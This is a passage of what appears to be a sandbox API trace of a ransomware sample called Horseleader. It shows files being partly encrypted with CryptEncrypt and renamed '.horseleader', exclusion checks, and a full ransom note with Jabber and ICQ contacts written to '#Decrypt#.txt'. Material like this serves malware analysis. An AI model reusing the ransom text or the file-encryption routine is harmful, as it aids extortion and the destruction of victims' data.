GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2522624) returned 1 [0165.769] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.769] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0165.826] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0165.827] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0165.827] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x131700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.827] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0165.996] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.996] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0165.997] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x262e00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.997] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0166.020] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.021] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0166.021] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.021] WriteFile (in: 
hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0166.022] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0166.022] CloseHandle (hObject=0x21c) returned 1 [0168.088] GetProcessHeap () returned 0x780000 [0168.088] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0168.088] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.horseleader") returned 90 [0168.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.horseleader")) returned 1 [0168.099] GetProcessHeap () returned 0x780000 [0168.099] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0168.100] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0168.100] lstrcmpiW 
(lpString1="WordMUI.xml", lpString2="Windows") returned 1 [0168.100] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0168.100] StrStrIW (lpFirst="WordMUI.xml", lpSrch=".horseleader") returned 0x0 [0168.100] lstrcmpW (lpString1="WordMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0168.100] lstrcmpW (lpString1="WordMUI.xml", lpString2="_uninstalling_.png") returned 1 [0168.100] lstrlenW (lpString=".testttjffg") returned 11 [0168.100] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".testttjffg") returned 0x0 [0168.101] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0168.101] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0168.101] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0168.102] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0168.102] StrStrW (lpFirst="WordMUI.xml", lpSrch=".txt") returned 0x0 [0168.102] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1800) returned 1 [0168.102] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x708, lpOverlapped=0x0) returned 1 [0168.104] SetFilePointerEx (in: hFile=0x21c, 
liDistanceToMove=0xfffff8f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.104] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x708, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x708, lpOverlapped=0x0) returned 1 [0168.104] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.104] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0168.105] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0168.105] CloseHandle (hObject=0x21c) returned 1 [0168.109] GetProcessHeap () returned 0x780000 [0168.109] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0168.109] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.horseleader") returned 90 [0168.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.horseleader")) returned 1 [0168.110] GetProcessHeap () returned 0x780000 [0168.110] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0168.110] FindNextFileW 
(in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="WordMUI.xml", cAlternateFileName="")) returned 0 [0168.110] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0168.110] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0168.110] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0168.111] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0168.111] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0168.112] lstrlenA (lpString="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") returned 1368 [0168.112] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0168.112] CloseHandle (hObject=0x1cc) returned 1 [0168.114] GetProcessHeap () returned 0x780000 [0168.114] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0168.114] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0168.114] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0168.114] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C") returned 66 [0168.114] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0168.114] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0168.114] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0168.114] GetProcessHeap () returned 0x780000 [0168.114] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0168.115] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*") returned 68 [0168.115] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0168.130] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0168.130] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.") returned 68 [0168.131] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0168.131] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0168.131] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0168.131] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0168.131] lstrlenW (lpString=".testttjffg") returned 11 [0168.131] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0168.131] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0168.131] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0168.131] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0168.132] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0168.132] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0168.132] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\..") returned 69 [0168.132] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0168.132] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0168.132] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0168.132] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0168.132] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0168.132] lstrlenW (lpString=".testttjffg") returned 11 [0168.132] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0168.132] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0168.133] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0168.133] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0168.133] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0168.133] lstrcmpiW (lpString1="Proof.en", lpString2="Windows") returned -1 [0168.133] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en") returned 75 [0168.133] lstrcmpW (lpString1="Proof.en", lpString2=".") returned 1 [0168.133] lstrcmpW (lpString1="Proof.en", lpString2="..") returned 1 [0168.133] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0168.133] GetProcessHeap () returned 0x780000 [0168.133] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0168.133] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*") returned 77 [0168.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0168.134] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0168.134] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\.") returned 77 [0168.134] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0168.134] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="..", cAlternateFileName="")) returned 1 [0168.134] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0168.134] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\..") returned 78 [0168.134] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0168.134] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0168.134] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, 
ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0168.134] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0168.134] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0168.135] StrStrIW (lpFirst="Proof.cab", lpSrch=".horseleader") returned 0x0 [0168.135] lstrcmpW (lpString1="Proof.cab", lpString2="#Decrypt#.txt") returned 1 [0168.135] lstrcmpW (lpString1="Proof.cab", lpString2="_uninstalling_.png") returned 1 [0168.135] lstrlenW (lpString=".testttjffg") returned 11 [0168.135] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", lpSrch=".testttjffg") returned 0x0 [0168.135] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0168.135] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0168.135] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0168.136] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0168.136] StrStrW (lpFirst="Proof.cab", lpSrch=".txt") returned 0x0 [0168.136] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=11482605) 
returned 1 [0168.137] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.137] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0168.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.190] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0168.191] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x5772f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.191] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0168.198] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.198] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0168.198] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xaee5ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.198] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0168.314] SetFilePointerEx 
